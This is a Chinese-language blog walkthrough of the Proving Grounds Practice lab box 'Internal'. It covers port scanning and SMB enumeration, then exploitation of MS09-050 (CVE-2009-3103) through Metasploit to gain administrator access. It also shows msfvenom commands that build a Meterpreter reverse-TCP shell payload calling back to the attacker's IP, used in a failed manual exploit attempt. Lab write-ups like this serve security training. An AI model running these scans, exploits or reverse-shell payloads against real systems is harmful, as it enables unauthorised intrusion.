Proving Grounds Practice : Internal Walkthrough

 Proving Grounds Practice : Internal Walkthrough


Foothole (立足點 ) :

  • 列舉常用的技術沒有發現,改用 nmapAutomator.sh 發現 CVE-2009-3103 漏洞
  • Metasploit 直接利用就進去了

PE ( 提權 ) :

  • 不用 PE,進去就管理者了

注意事項 : 

  • 甚麼都找不到的時候記得 nmapAutomator.sh 給它下去就對了


Kali IP : 192.168.45.167

靶機 IP : 192.168.164.40


第一步掃 Port,└─$ rustscan -a 192.168.164.40 --scripts none --ulimit 5000 | tee rustscan





snmp 沒開,└─$ sudo nmap -sU -p 161 192.168.164.40 | tee snmp


               

nmap,└─$ sudo nmap -sCV -A -p 53,135,139,445,3389,5357,49152,49153,49154,49155,49156,49157,49158 192.168.164.40 | tee nmap
53 Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
5357 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)



enum4linux 沒啥有用的資訊,└─$ enum4linux -a 192.168.164.40 | tee enum4linux                             




5357 /



5357 /robots.txt



gobuster 5357 也沒有東西,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.164.40:5357 -c -t 150 --exclude-length 326 -x txt,pdf,git,aspx | tee gobuster




暫時卡住,只好改用耗時間的 nmapAutomator.sh 試試看

參考 : https://github.com/21y4d/nmapAutomator

第一步先用參數 -Full,└─$ ./nmapAutomator.sh -H 192.168.164.40 -t Full | tee nmapauto-full

結果跟之前幾個差不多,沒有新發現


接著繼續用餐數 -Vulns,└─$ ./nmapAutomator.sh -H 192.168.164.40 -t Vulns | tee nmapauto-vulns




再次使用 nmap 帶 script 測試 SMB 漏洞,└─$ sudo nmap -script=smb-vuln\* -p445 192.168.164.40




發現 MS09-050,CVE-2009-3103 搜尋 Exploit-DB 發現有 Metasploit



直接先試試看 Metasploit,└─$ sudo msfconsole -q                                                      

然後 search ms09-050,use 0


show options 看看與改好



直接進去就管理者了



參考 Exploit-DB 試著用手動打打看,使用第一個 40280 有 Python 的試試看




python code 裡面有說明要自己建立 payload,#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread  -f python



建立 payload 然後改 Code

└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.167 LPORT=4444 EXITFUNC=thread -f python



結果失敗.......GG,手動沒有成功


留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)